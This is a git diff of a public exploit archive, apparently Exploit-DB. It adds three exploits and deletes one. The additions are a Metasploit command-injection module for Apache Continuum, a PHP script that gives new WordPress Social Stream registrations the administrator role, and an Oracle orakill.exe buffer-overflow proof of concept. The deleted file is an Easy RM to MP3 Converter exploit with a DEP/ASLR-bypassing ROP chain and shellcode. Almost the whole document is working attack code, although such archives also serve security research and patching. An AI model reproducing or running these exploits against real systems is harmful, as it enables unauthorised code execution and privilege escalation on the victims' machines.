diff --git a/files.csv b/files.csv
index 342d3dd26..9c4dabbc4 100755
--- a/files.csv
+++ b/files.csv
@@ -36111,7 +36111,6 @@ id,file,description,date,author,platform,type,port
 39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80
 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
-39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0
 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
@@ -36123,3 +36122,6 @@ id,file,description,date,author,platform,type,port
 39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0
 39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
 39944,platforms/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
+39945,platforms/linux/remote/39945.rb,"Apache Continuum Arbitrary Command Execution",2016-06-14,metasploit,linux,remote,8080
+39946,platforms/php/webapps/39946.php,"WordPress Social Stream Plugin 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80
+39947,platforms/windows/dos/39947.py,"Oracle Orakill.exe 11.2.0 - Buffer Overflow",2016-06-14,hyp3rlinx,windows,dos,0
diff --git a/platforms/linux/remote/39945.rb b/platforms/linux/remote/39945.rb
new file mode 100755
index 000000000..f8aead12e
--- /dev/null
+++ b/platforms/linux/remote/39945.rb
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Continuum Arbitrary Command Execution',
+      'Description'    => %q{
+        This module exploits a command injection in Apache Continuum <= 1.4.2.
+        By injecting a command into the installation.varValue POST parameter to
+        /continuum/saveInstallation.action, a shell can be spawned.
+      },
+      'Author'         => [
+        'David Shanahan', # Proof of concept
+        'wvu'             # Metasploit module
+      ],
+      'References'     => [
+        %w{EDB 39886}
+      ],
+      'DisclosureDate' => 'Apr 6 2016',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Apache Continuum <= 1.4.2', {}]
+      ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      Opt::RPORT(8080)
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/continuum/about.action'
+    )
+
+    if res && res.body.include?('1.4.2')
+      CheckCode::Appears
+    elsif res && res.code == 200
+      CheckCode::Detected
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status('Injecting CmdStager payload...')
+    execute_cmdstager(flavor: :bourne)
+  end
+
+  def execute_command(cmd, opts = {})
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => '/continuum/saveInstallation.action',
+      'vars_post' => {
+        'installation.name'     => Rex::Text.rand_text_alpha(8),
+        'installation.type'     => 'jdk',
+        'installation.varValue' => '`' + cmd + '`'
+      }
+    )
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/39946.php b/platforms/php/webapps/39946.php
new file mode 100755
index 000000000..a7069a023
--- /dev/null
+++ b/platforms/php/webapps/39946.php
@@ -0,0 +1,147 @@
+<?php
+/**
+ * Exploit Title: WordPress Social Stream  Exploit
+ * Google Dork:
+ * Exploit Author: wp0Day.com <contact@wp0day.com>
+ * Vendor Homepage:
+ * Software Link: http://codecanyon.net/item/wordpress-social-stream/2201708?s_rank=15
+ * Version: 1.5.15
+ * Tested on: Debian 8, PHP 5.6.17-3
+ * Type: Authenticated wp_options overwrite
+ * Time line: Found [14-May-2016], Vendor notified [14-May-2016], Vendor fixed: [v1.5.16 19/05/2016 (Current Version)],  [RD:1465606136]
+ */
+
+
+require_once('curl.php');
+//OR
+//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
+$curl = new CurlWrapper();
+
+
+$options = getopt("t:m:u:p:f:c:",array('tor:'));
+print_r($options);
+$options = validateInput($options);
+
+if (!$options){
+    showHelp();
+}
+
+if ($options['tor'] === true)
+{
+    echo " ### USING TOR ###\n";
+    echo "Setting TOR Proxy...\n";
+    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
+    $curl->addOption(CURLOPT_PROXYTYPE,7);
+    echo "Checking IPv4 Address\n";
+    $curl->get('https://dynamicdns.park-your-domain.com/getip');
+    echo "Got IP : ".$curl->getResponse()."\n";
+    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
+    $answer = fgets(fopen ("php://stdin","r"));
+    if(trim($answer) != 'wololo'){
+        die("Aborting!\n");
+    }
+    echo "OK...\n";
+}
+
+
+function logIn(){
+    global $curl, $options;
+    file_put_contents('cookies.txt',"\n");
+    $curl->setCookieFile('cookies.txt');
+    $curl->get($options['t']);
+    $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
+    $curl->post($options['t'].'/wp-login.php', $data);
+    $status =  $curl->getTransferInfo('http_code');
+    if ($status !== 302){
+        echo "Login probably failed, aborting...\n";
+        echo "Login response saved to login.html.\n";
+        die();
+    }
+    file_put_contents('login.html',$curl->getResponse());
+
+
+}
+
+function exploit(){
+    global $curl, $options;
+    if ($options['m'] == 'admin_on'){
+        echo "\nEnabling Admin mode\n";
+        $data = array('action'=>'dcwss_update', 'option_name'=>'default_role', 'option_value'=>'administrator' );
+        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
+        $resp = $curl->getResponse();
+        echo "Response: ". $resp."\n";
+
+    }
+    if ($options['m'] == 'admin_off'){
+        echo "\nDisabling Admin mode\n";
+        $data = array('action'=>'dcwss_update', 'option_name'=>'default_role', 'option_value'=>'subscriber' );
+        $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
+        $resp = $curl->getResponse();
+        echo "Response: ". $resp."\n";
+
+    }
+}
+
+
+logIn();
+exploit();
+
+
+
+function validateInput($options){
+
+    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
+        return false;
+    }
+    if ( !isset($options['u']) ){
+        return false;
+    }
+    if ( !isset($options['p']) ){
+        return false;
+    }
+    if (!preg_match('~/$~',$options['t'])){
+        $options['t'] = $options['t'].'/';
+    }
+    if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){
+        return false;
+    }
+    if ($options['m'] == 'r' && !isset($options['f'])){
+        return false;
+    }
+    $options['tor'] = isset($options['tor']);
+
+    return $options;
+}
+
+
+function showHelp(){
+    global $argv;
+    $help = <<<EOD
+
+    WordPress Social Stream  Expoit Pack
+
+Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]
+
+       *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
+
+       [TARGET_URL] http://localhost/wordpress/
+       [MODE] admin_on - Sets default role on registration to Administrator
+              admin_off - Sets default role on registration to Subscriber
+
+Exploit Flow: Call the exploit with -m admin_on, and register a user manually.
+              After registration call the exploit agiain with -m admin_off .
+
+
+
+Examples:
+       php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m admin_on
+
+    Misc:
+           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
+           @link http://github.com/svyatov/CurlWrapper
+           @license http://www.opensource.org/licenses/mit-license.html MIT License
+
+EOD;
+    echo $help."\n\n";
+    die();
+}
\ No newline at end of file
diff --git a/platforms/windows/dos/39947.py b/platforms/windows/dos/39947.py
new file mode 100755
index 000000000..1a2165e81
--- /dev/null
+++ b/platforms/windows/dos/39947.py
@@ -0,0 +1,128 @@
+'''
+[+] Credits: hyp3rlinx 
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/ORACLE-ORAKILL.EXE-BUFFER-OVERFLOW.txt
+
+[+] ISR: apparitionsec
+
+
+Vendor:
+==============
+www.oracle.com
+
+
+Product:
+===================
+orakill.exe v11.2.0
+
+
+The orakill utility is provided with Oracle databases on Windows platforms. The executable (orakill.exe) is available to DBAs to kill Oracle
+sessions directly from the DOS command line without requiring any connection to the database.
+
+
+C:\oraclexe\app\oracle\product\11.2.0\server\bin>orakill.exe -h
+
+Usage:  orakill sid thread
+
+  where sid  = the Oracle instance to target
+        thread = the thread id of the thread to kill
+
+  The thread id should be retrieved from the spid column of a query such as:
+
+        select spid, osuser, s.program from
+        v$process p, v$session s where p.addr=s.paddr
+
+
+Vulnerability Type:
+===================
+Buffer Overflow
+
+
+Reference:
+==========
+http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
+
+
+Vulnerability Details:
+=====================
+
+ToLower() filter being applied to supplied arguments e.g. 'A' \x41 beomes 'a' \x61 etc... may be possible to subvert using encoder
+technique like "ALPHA3". Also we need to supply a second argument of just 4 bytes to trigger the access violation.
+
+orakill.exe <104 bytes>, <4 bytes>
+
+Register dump.
+
+EAX 40000000
+ECX 0018FCA8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaarrrr"
+EDX 00000000
+EBX 61616161
+ESP 0018FD10 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaarrrr"
+EBP 61616161
+ESI 61616161
+EDI 61616161
+EIP 61616161
+C 0  ES 002B 32bit 0(FFFFFFFF)
+P 0  CS 0023 32bit 0(FFFFFFFF)
+A 0  SS 002B 32bit 0(FFFFFFFF)
+Z 0  DS 002B 32bit 0(FFFFFFFF)
+S 0  FS 0053 32bit 7EFDD000(FFF)
+T 0  GS 002B 32bit 0(FFFFFFFF)
+D 0
+O 0  LastErr ERROR_SUCCESS (00000000)
+EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
+ST0 empty g
+ST1 empty g
+ST2 empty g
+ST3 empty g
+ST4 empty g
+ST5 empty g
+ST6 empty g
+ST7 empty g
+               3 2 1 0      E S P U O Z D I
+FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
+FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
+
+
+Exploit code(s):
+================
+'''
+
+import subprocess
+
+pgm="C:\\oraclexe\\app\\oracle\\product\\11.2.0\\server\\bin\\orakill.exe "
+
+payload="A"*100 + "RRRR"
+subprocess.Popen([pgm, payload, " BBBB"], shell=False)
+
+
+'''
+Disclosure Timeline:
+====================================
+Vendor Notification:  October 5, 2015
+Vendor Fix: April 25, 2016
+June 13, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+================
+Low
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx
+'''
\ No newline at end of file
diff --git a/platforms/windows/local/39933.py b/platforms/windows/local/39933.py
deleted file mode 100755
index 8453994d2..000000000
--- a/platforms/windows/local/39933.py
+++ /dev/null
@@ -1,192 +0,0 @@
-# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
-# Date: 2016-06-12
-# Exploit Author: Csaba Fitzl
-# Vendor Homepage: N/A
-# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
-# Version: 2.7.3.700
-# Tested on: Windows 7 x64
-# CVE : CVE-2009-1330
-
-import struct
-
-def create_rop_chain():
-
-	# rop chain generated with mona.py - www.corelan.be
-	# added missing parts, and some optimisation by Csaba Fitzl
-	rop_gadgets = [
-
-	  #mov 1000 to EDX - Csaba
-	  0x41414141,  # Filler (compensate)
-	  0x41414141,  # Filler (compensate)
-	  0x41414141,  # Filler (compensate)
-	  0x10025a1c,  # XOR EDX,EDX # RETN 
-	  0x1002bc3d,  # MOV EAX,411 # RETN
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc24,  # ADD EAX,80 # POP EBP # RETN
-	  0x41414141,  # Filler (compensate)
-	  0x1002dc41,  # ADD EAX,40 # POP EBP # RETN
-	  0x41414141,  # Filler (compensate)
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x10023327,  # INC EAX # RETN
-	  0x10023327,  # INC EAX # RETN
-	  0x10023327,  # INC EAX # RETN
-	  # AT this point EAX = 0x1000
-	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
-	  0x41414141,  # Filler (compensate)
-	  0x41414141,  # Filler (compensate)
-	  0x41414141,  # Filler (compensate)
-	  0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
-	  0x41414141,  # Filler (compensate)
-	  
-	
-	  0x10026d56,  # POP EAX # RETN [MSRMfilter03.dll] 
-	  0x10032078,  # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
-	  0x1002e0c8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
-	   
-	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
-	  0x41414141,  # Filler (compensate)
-	  0x41414141,  # Filler (compensate)
-	  0x41414141,  # Filler (compensate)
-	  0x10027c5a,  # POP EBP # RETN [MSRMfilter03.dll] 
-	  0x1001b058,  # & push esp # ret  [MSRMfilter03.dll]
-	  0x1002b93e,  # POP EAX # RETN [MSRMfilter03.dll] 
-	  0xfffffffb,  # put delta into eax (-> put 0x00000001 into ebx)
-	  0x1001d2ac,  # ADD EAX,4 # RETN
-	  0x10023327,  # INC EAX # RETN
-	  0x10023327,  # INC EAX # RETN
-	  0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 
-	  0x41414141,  # Filler (compensate)
-	  0x41414141,  # Filler (compensate)
-
-	  0x10029f74,  # POP ECX # RETN [MSRMfilter03.dll] 
-	  0xffffffff,  #  
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
-	  0x1002bc6a,  # POP EDI # RETN [MSRMfilter03.dll] 
-	  0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
-	  0x10026f2b,  # POP EAX # RETN [MSRMfilter03.dll] 
-	  0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
-	  0x1002bc07  # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL 
-
-	]
-	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
-
-buffersize = 26090
-
-junk = "A" * buffersize
-
-eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} :  # ADD ESP,8 # RETN
-
-rop = create_rop_chain()
-
-calc = (
-"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
-"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
-"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
-"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
-"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
-"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
- 
-
-shell = "\x90"*0x10 + calc
-
-exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
-
-filename = "list.m3u"
-textfile = open(filename , 'w')
-textfile.write(exploit)
-textfile.close()
\ No newline at end of file